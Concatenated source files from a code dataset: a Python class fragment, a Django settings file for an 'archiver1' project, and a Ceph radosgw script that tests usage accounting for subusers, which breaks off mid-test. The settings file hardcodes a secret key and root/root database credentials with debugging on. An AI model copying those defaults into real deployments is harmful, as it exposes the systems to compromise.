def getHasDestructor(self):
return self.__hasDestructor
def getConstructorCount(self):
return len(self.__constructors)
def _addConstructor(self, constructor):
self.__constructors.append(constructor)
def getConstructor(self, idx):
return self.__constructors[idx]
def _setMembers(self, members):
for m in members:
self.__members.append(KLMember(m['access'], m['baseType'], m['memberDecls'][0]['name']))
def getMemberCount(self):
return len(self.__members)
def getMember(self, idx):
return self.__members[idx]
def getGetterCount(self):
return len(self.__getters)
def getSetterCount(self):
return len(self.__setters)
def _addGetter(self, methodName, returnType, access):
self.__getters.append(KLFunction(methodName, returnType=returnType, access=access))
def getGetter(self, idx):
return self.__getters[idx]
def _addSetter(self, methodName, params, access):
setterFunc = KLFunction(methodName, access=access)
setterFunc._addParams(params)
self.__setters.append(setterFunc)
def getSetter(self, idx):
return self.__setters[idx]
def getMethodCount(self):
return len(self.__methods)
def _addMethod(self, methodName, returnType, params, access):
methodFunc = KLFunction(methodName, returnType=returnType, access=access)
methodFunc._addParams(params)
self.__methods.append(methodFunc)
def getMethod(self, idx):
return self.__methods[idx]
def getOperatorCount(self):
return len(self.__operators)
def _addOperator(self, operatorName, params, access):
operatorFunc = KLFunction(operatorName, access=access)
operatorFunc._addParams(params)
self.__operators.append(operatorFunc)
def getOperator(self, idx):
return self.__operators[idx]
def _setParents(self, parentsAndInterfaces):
self.__parents = parentsAndInterfaces
def _getParents(self):
return self.__parents
def getParentsCount(self):
return len(self.__parents)
def getParent(self, idx):
return self.__parents[idx]
| [
"sbertout@gmail.com"
] | sbertout@gmail.com |
5202d463d31de81cbb64c1e559dfe2024235644d | 5db0c193e6de720b199c2736c70911aca7fe35c5 | /archiver1/settings.py | c6e25c5c7f9a31adf83fa074f20c8c8304fc094b | [] | no_license | cheslip/archiver-py | 5926cd1e2d3fe1ce129896b599220da20ae25b7e | 13cf49d1420b4edc5ad816c5f52f7f92971fe1b9 | refs/heads/master | 2021-01-01T06:55:30.285580 | 2012-08-02T06:42:47 | 2012-08-02T06:42:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,360 | py | # Django settings for archiver1 project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'archiver', # Or path to database file if using sqlite3.
'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'root', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = None
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'tcc^*$c9w^xc3lr7gcw%skli6$$i-^-fy#(nq!em6w758o^kj8'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'archiver1.urls'
LOGIN_URL = '/login/'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'archiver1.wsgi.application'
TEMPLATE_DIRS = ('templates',)
AUTH_PROFILE_MODULE = 'employee.Employee'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'reversion',
'accounts',
'boxes',
'employee',
)
SESSION_COOKIE_AGE = 172800
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| [
"cheslip@mac.com"
] | cheslip@mac.com |
dd1444d5ca080d334504e7dd0362c639af1c7e2c | d9b02979df31f64cd6683a522fe0eb5d51f876b2 | /auto_test.py | b2450078abd0854b21f6eb2b5192051879f918e7 | [] | no_license | ZVampirEM77/SubuserAutoTest | a5f58b6b736d3c1ec67d317b76310db207add034 | 28bdc0f1a22d23c024653201fb59bd7f7ed0218b | refs/heads/master | 2020-12-03T07:55:38.151064 | 2017-07-03T05:59:14 | 2017-07-03T05:59:14 | 95,639,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153,317 | py | '''
By Enming Zhang
Email: enming.zhang@umcloud.com
2017-06-27
'''
import sys, os, json
import time
import argparse
import subprocess
ceph_version = '<K'
ceph_path = "/home/zvampirem/subuser/ceph/src/"
py_dir = os.getcwd()
def exec_command(command):
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
p.communicate()
def exec_command_with_return(command):
return subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout
def ok_display(content):
return "[\033[1;;32m%s\033[0m]" % (content)
def fail_display(content):
return "[\033[1;;41m%s\033[0m]" % (content)
def get_user_name(user_dic):
    """Return the canonical rgw identity for a usage entry.

    Entries that carry a "subuser" key are rendered as "user:subuser",
    plain users as just "user".
    """
    if "subuser" not in user_dic:
        return user_dic["user"]
    return user_dic["user"] + ":" + user_dic["subuser"]
def parse_response_content(res_content):
    """Flatten a `radosgw-admin usage show` JSON payload.

    Produces {identity: {bucket: {"categories": {category:
    {"ops": int, "successful_ops": int}}}}} where identity comes from
    get_user_name() ("user" or "user:subuser").
    """
    parsed = {}
    for entry in res_content["entries"]:
        identity = get_user_name(entry)
        buckets = {}
        for bucket_info in entry["buckets"]:
            cats = {}
            for cat in bucket_info["categories"]:
                cats[cat["category"]] = {"ops": cat["ops"],
                                         "successful_ops": cat["successful_ops"]}
            buckets[bucket_info["bucket"]] = {"categories": cats}
        parsed[identity] = buckets
    return parsed
def verify_show_response_msg(req_command, expect_dict):
    """Run *req_command* (a `radosgw-admin usage show` invocation), parse its
    JSON output, and compare it against *expect_dict*.

    expect_dict holds "entries_size" (expected length of both "entries" and
    "summary") plus one key per expected identity mapping to that identity's
    per-bucket category counters.  Returns True on match, False otherwise,
    printing the raw and parsed payloads on mismatch for debugging.
    """
    usage_log = exec_command_with_return(req_command)
    data = json.load(usage_log)
    result = True
    user_dict = {}
    # Both the entries list and the per-user summary must have the expected size.
    if len(data["entries"]) == expect_dict["entries_size"] and len(data["summary"]) == expect_dict["entries_size"]:
        if len(data["entries"]) != 0:
            user_dict = parse_response_content(data)
            for user_info in data["entries"]:
                user = get_user_name(user_info)
                if user_dict[user] != expect_dict[user]:
                    # Dump actual vs expected state for debugging.
                    print data
                    print '---------------------'
                    print user_dict[user]
                    print '+++++++++++++++++++++'
                    print expect_dict
                    result = False
                else:
                    # NOTE(review): this resets result to True, so a matching
                    # entry AFTER a mismatching one masks the earlier failure —
                    # confirm whether that is intended (harmless while each
                    # expect_dict describes a single identity).
                    result = True
        # When entries_size is 0 and matches, result stays True from its
        # initial value.
    else:
        print data
        result = False
    return result
def exec_based_on_version(command):
    """Run a radosgw-admin *command* using the binary path layout that matches
    the configured ceph version ('./bin/' for >=Kraken, './' otherwise)."""
    prefix = './bin/' if ceph_version == '>=K' else './'
    exec_command(prefix + command)
def verify_show_based_on_version(command, expect_dict):
    """Prefix *command* with the version-appropriate binary path and delegate
    the JSON comparison to verify_show_response_msg(); returns its bool."""
    prefix = './bin/' if ceph_version == '>=K' else './'
    return verify_show_response_msg(prefix + command, expect_dict)
class TestCase1(object):
def prepare(self):
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
os.chdir(py_dir)
exec_command('s3cmd -c user1.s3cfg mb s3://test1')
exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test1')
exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
time.sleep(30)
def run(self):
expect_dict1 = {"entries_size": 1,
"user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
"put_obj": {"ops": 1, "successful_ops": 1}}},
"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
expect_dict2 = {"entries_size": 1,
"user1:subuser1": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
expect_dict3 = {"entries_size": 1,
"user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
self.prepare()
result1 = result2 = result3 = False
os.chdir(ceph_path)
result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
os.chdir(py_dir)
if result1 == result2 == result3 == True:
print "testcase1 %s" % (ok_display("OK"))
else:
print "testcase1 %s" % (fail_display("FAIL"))
self.clean()
def clean(self):
exec_command('s3cmd -c user1.s3cfg rb s3://test1 --recursive')
exec_command('s3cmd -c subuser2.s3cfg rb s3://test2')
time.sleep(30)
os.chdir(ceph_path)
exec_based_on_version('radosgw-admin usage trim --uid=user1')
exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
os.chdir(py_dir)
class TestCase2(object):
    """Incremental write attribution: three writes to the same bucket (by
    subuser1, subuser2 and user1 in turn) must each appear only in the
    acting identity's usage view while accumulating under user1."""
    def prepare(self):
        """Create user1 with full-access subuser1 and subuser2."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
        os.chdir(py_dir)
    def op1(self):
        """subuser1 creates bucket test1."""
        exec_command('s3cmd -c subuser1.s3cfg mb s3://test1')
        # Wait for rgw to flush the usage log before the next verification.
        time.sleep(30)
    def op2(self):
        """subuser2 uploads an object into test1."""
        exec_command('s3cmd -c subuser2.s3cfg put user1.s3cfg s3://test1')
        time.sleep(30)
    def op3(self):
        """user1 itself uploads an object into test1."""
        exec_command('s3cmd -c user1.s3cfg put subuser1.s3cfg s3://test1')
        time.sleep(30)
    def run(self):
        """Execute op1..op3, verifying user/subuser usage after each step."""
        result1 = result2 = result3 = False
        self.prepare()
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict2)
        os.chdir(py_dir)
        if result1 == result2 == True:
            self.op2()
            expect_dict3 = {"entries_size": 1,
                            "user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict4 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict5 = {"entries_size": 1,
                            "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            os.chdir(py_dir)
            if result1 == result2 ==result3 == True:
                self.op3()
                expect_dict6 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 2, "successful_ops": 2}}}}}
                expect_dict7 = {"entries_size": 1,
                                "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict8 = {"entries_size": 1,
                                "user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict6)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict7)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict8)
                os.chdir(py_dir)
                if result1 == result2 ==result3 == True:
                    print "testcase2 %s" % (ok_display("OK"))
                else:
                    print "testcase2 %s" % (fail_display("FAIL"))
            else:
                print "testcase2 %s" % (fail_display("FAIL"))
        else:
            print "testcase2 %s" % (fail_display("FAIL"))
class TestCase3(object):
    """Read attribution: downloads of the objects left by TestCase2 (by
    user1, subuser1, subuser2 in turn) must increment get_obj only for the
    acting identity while accumulating under user1.  Relies on the state
    TestCase2 leaves behind (bucket test1 with two objects)."""
    def op1(self):
        """user1 downloads both objects from test1."""
        exec_command('s3cmd -c user1.s3cfg get s3://test1/user1.s3cfg 3-1.txt')
        exec_command('s3cmd -c user1.s3cfg get s3://test1/subuser1.s3cfg 3-2.txt')
        # Wait for rgw to flush the usage log before the next verification.
        time.sleep(30)
    def op2(self):
        """subuser1 downloads both objects from test1."""
        exec_command('s3cmd -c subuser1.s3cfg get s3://test1/user1.s3cfg 3-3.txt')
        exec_command('s3cmd -c subuser1.s3cfg get s3://test1/subuser1.s3cfg 3-4.txt')
        time.sleep(30)
    def op3(self):
        """subuser2 downloads both objects from test1."""
        exec_command('s3cmd -c subuser2.s3cfg get s3://test1/user1.s3cfg 3-5.txt')
        exec_command('s3cmd -c subuser2.s3cfg get s3://test1/subuser1.s3cfg 3-6.txt')
        time.sleep(30)
    def run(self):
        """Execute op1..op3, verifying user/subuser usage after each step."""
        result1 = result2 = result3 = False
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 2, "successful_ops": 2},
                                                           "get_obj": {"ops": 2, "successful_ops": 2}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        os.chdir(py_dir)
        if result1 == result2 == result3 == True:
            self.op2()
            expect_dict4 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 2, "successful_ops": 2},
                                                               "get_obj": {"ops": 4, "successful_ops": 4}}}}}
            expect_dict5 = {"entries_size": 1,
                            "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 2, "successful_ops": 2}}}}}
            expect_dict6 = {"entries_size": 1,
                            "user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
            os.chdir(py_dir)
            if result1 == result2 ==result3 == True:
                self.op3()
                expect_dict7 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 2, "successful_ops": 2},
                                                                   "get_obj": {"ops": 6, "successful_ops": 6}}}}}
                expect_dict8 = {"entries_size": 1,
                                "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 2, "successful_ops": 2}}}}}
                expect_dict9 = {"entries_size": 1,
                                "user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 2, "successful_ops": 2}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
                os.chdir(py_dir)
                if result1 == result2 ==result3 == True:
                    print "testcase3 %s" % (ok_display("OK"))
                else:
                    print "testcase3 %s" % (fail_display("FAIL"))
            else:
                print "testcase3 %s" % (fail_display("FAIL"))
        else:
            print "testcase3 %s" % (fail_display("FAIL"))
class TestCase4(object):
    """Delete attribution: object deletion by user1 and subuser2 plus the
    final bucket removal must be accounted to the acting identity while
    accumulating under user1.  Continues from TestCase3's state and tears
    everything down in clean()."""
    def op1(self):
        """user1 deletes one object from test1."""
        exec_command('s3cmd -c user1.s3cfg del s3://test1/subuser1.s3cfg')
        # Wait for rgw to flush the usage log before the next verification.
        time.sleep(30)
    def op2(self):
        """subuser2 deletes the remaining object from test1."""
        exec_command('s3cmd -c subuser2.s3cfg del s3://test1/user1.s3cfg')
        time.sleep(30)
    def op3(self):
        """user1 removes the now-empty bucket test1."""
        exec_command('s3cmd -c user1.s3cfg rb s3://test1')
        time.sleep(30)
    def run(self):
        """Execute op1..op3, verifying user/subuser usage after each step."""
        result1 = result2 = result3 = False
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                           "put_obj": {"ops": 2, "successful_ops": 2},
                                                           "get_obj": {"ops": 6, "successful_ops": 6},
                                                           "delete_obj": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                    "get_obj": {"ops": 2, "successful_ops": 2}}}}}
        expect_dict3 = {"entries_size": 1,
                        "user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                    "get_obj": {"ops": 2, "successful_ops": 2}}}}}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        os.chdir(py_dir)
        if result1 == result2 == result3 == True:
            self.op2()
            expect_dict4 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                               "put_obj": {"ops": 2, "successful_ops": 2},
                                                               "get_obj": {"ops": 6, "successful_ops": 6},
                                                               "delete_obj": {"ops": 2, "successful_ops": 2}}}}}
            expect_dict5 = {"entries_size": 1,
                            "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 2, "successful_ops": 2}}}}}
            expect_dict6 = {"entries_size": 1,
                            "user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                        "get_obj": {"ops": 2, "successful_ops": 2},
                                                                        "delete_obj": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
            os.chdir(py_dir)
            if result1 == result2 == result3 == True:
                self.op3()
                expect_dict7 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 2, "successful_ops": 2},
                                                                   "get_obj": {"ops": 6, "successful_ops": 6},
                                                                   "delete_obj": {"ops": 2, "successful_ops": 2},
                                                                   "delete_bucket": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict8 = {"entries_size": 1,
                                "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 2, "successful_ops": 2}}}}}
                expect_dict9 = {"entries_size": 1,
                                "user1:subuser2": {"test1": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1},
                                                                            "get_obj": {"ops": 2, "successful_ops": 2},
                                                                            "delete_obj": {"ops": 1, "successful_ops": 1}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
                os.chdir(py_dir)
                if result1 == result2 ==result3 == True:
                    print "testcase4 %s" % (ok_display("OK"))
                else:
                    print "testcase4 %s" % (fail_display("FAIL"))
            else:
                print "testcase4 %s" % (fail_display("FAIL"))
        else:
            print "testcase4 %s" % (fail_display("FAIL"))
        self.clean()
    def clean(self):
        """Trim user1's usage log, delete user1, and remove the downloaded files."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin usage trim --uid=user1')
        exec_based_on_version('radosgw-admin user rm --uid=user1 --purge-data --purge-keys')
        os.chdir(py_dir)
        # 3*.txt are the local copies fetched by TestCase3/TestCase4 ops.
        exec_command('rm 3*.txt')
class TestCase5(object):
    """Cross-bucket attribution: operations spread over three buckets
    (test1 by subuser1, test2 by subuser2, test3 by user1) must show up
    per-bucket in each identity's usage view."""
    def prepare(self):
        """Create user1 with full-access subuser1 and subuser2."""
        os.chdir(ceph_path)
        exec_based_on_version('radosgw-admin user create --uid=user1 --access-key=user1 --secret-key=user1 --display-name="user1"')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser1 --access=full --access-key=subuser1 --secret-key=subuser1')
        exec_based_on_version('radosgw-admin subuser create --key-type=s3 --uid=user1 --subuser=subuser2 --access=full --access-key=subuser2 --secret-key=subuser2')
        os.chdir(py_dir)
    def op1(self):
        """subuser1 creates bucket test1."""
        exec_command('s3cmd -c subuser1.s3cfg mb s3://test1')
        # Wait for rgw to flush the usage log before the next verification.
        time.sleep(30)
    def op2(self):
        """subuser2 creates bucket test2."""
        exec_command('s3cmd -c subuser2.s3cfg mb s3://test2')
        time.sleep(30)
    def op3(self):
        """subuser1 uploads an object into subuser2's bucket test2."""
        exec_command('s3cmd -c subuser1.s3cfg put user1.s3cfg s3://test2')
        time.sleep(30)
    def op4(self):
        """user1 creates bucket test3 and uploads an object into it."""
        exec_command('s3cmd -c user1.s3cfg mb s3://test3')
        exec_command('s3cmd -c user1.s3cfg put subuser1.s3cfg s3://test3')
        time.sleep(30)
    def run(self):
        """Execute op1..op4, verifying user/subuser usage after each step."""
        result1 = result2 = result3 = False
        self.prepare()
        self.op1()
        expect_dict1 = {"entries_size": 1,
                        "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict2 = {"entries_size": 1,
                        "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
        expect_dict3 = {"entries_size": 0}
        os.chdir(ceph_path)
        result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict1)
        result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict2)
        result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict3)
        os.chdir(py_dir)
        if result1 == result2 == result3 == True:
            self.op2()
            expect_dict4 = {"entries_size": 1,
                            "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                      "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict5 = {"entries_size": 1,
                            "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            expect_dict6 = {"entries_size": 1,
                            "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
            os.chdir(ceph_path)
            result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict4)
            result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict5)
            result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict6)
            os.chdir(py_dir)
            if result1 == result2 == result3 == True:
                self.op3()
                expect_dict7 = {"entries_size": 1,
                                "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                          "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                   "put_obj": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict8 = {"entries_size": 1,
                                "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                                   "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
                expect_dict9 = {"entries_size": 1,
                                "user1:subuser2": {"test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}}}}
                os.chdir(ceph_path)
                result1 = verify_show_based_on_version('radosgw-admin usage show --uid=user1', expect_dict7)
                result2 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser1', expect_dict8)
                result3 = verify_show_based_on_version('radosgw-admin usage show --uid=user1 --subuser=subuser2', expect_dict9)
                os.chdir(py_dir)
                if result1 == result2 == result3 == True:
                    self.op4()
                    expect_dict10 = {"entries_size": 1,
                                     "user1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                               "test2": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "put_obj": {"ops": 1, "successful_ops": 1}}},
                                               "test3": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1},
                                                                        "put_obj": {"ops": 1, "successful_ops": 1}}}}}
                    expect_dict11 = {"entries_size": 1,
                                     "user1:subuser1": {"test1": {"categories": {"create_bucket": {"ops": 1, "successful_ops": 1}}},
                                                        "test2": {"categories": {"put_obj": {"ops": 1, "successful_ops": 1}}}}}
                    expect_dict12 = {"entries_size": 1,
